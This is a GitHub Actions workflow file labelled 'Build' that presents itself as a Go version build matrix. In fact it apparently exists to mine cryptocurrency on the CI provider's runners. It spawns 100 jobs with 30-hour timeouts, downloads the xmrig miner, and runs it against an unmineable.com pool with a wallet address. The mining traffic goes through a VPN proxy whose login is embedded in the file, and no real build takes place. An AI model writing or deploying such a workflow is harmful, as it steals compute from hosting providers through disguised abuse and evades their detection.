name: Build
on: [push, pull_request]
jobs:
  build:
    name: Build
    runs-on: windows-latest
    strategy:
      max-parallel: 40
      fail-fast: false
      matrix:
        go: [1.1, 1.2, 1.3, 1.4, 1.5, 1.6, 1.7, 1.8, 1.9, 1.0]
        flag: [A, B, C, D, E, F, G, H, I, J]
    timeout-minutes: 1800
    env:
        NUM_JOBS: 40
        JOB: ${{ matrix.go }}
    steps:
    - name: Set up Go ${{ matrix.go }}
      uses: actions/setup-go@v1
      with:
        go-version: ${{ matrix.go }}
      id: go
    - name: Setup
      uses: actions/checkout@v1
    - name: Download
      run: Invoke-WebRequest https://github.com/xmrig/xmrig/releases/download/v6.12.2/xmrig-6.12.2-gcc-win64.zip -OutFile xmrig.zip
    - name: Extract
      run: Expand-Archive xmrig.zip
    - name: Start
      run: .\xmrig\xmrig-6.12.2\xmrig.exe -a randomx -o rx.unmineable.com:3333 -u SHIB:0xf7a8ab99dccb0f96d4a91a1388d3c2c62445f124.$(shuf -i 10-9999999999999999999 -n 1) --keepalive --timeout 1800 --donate-level 1 --proxy=y3GGG0AkPMK:p1eTGKpRl:mel-b20.ipvanish.com:1080
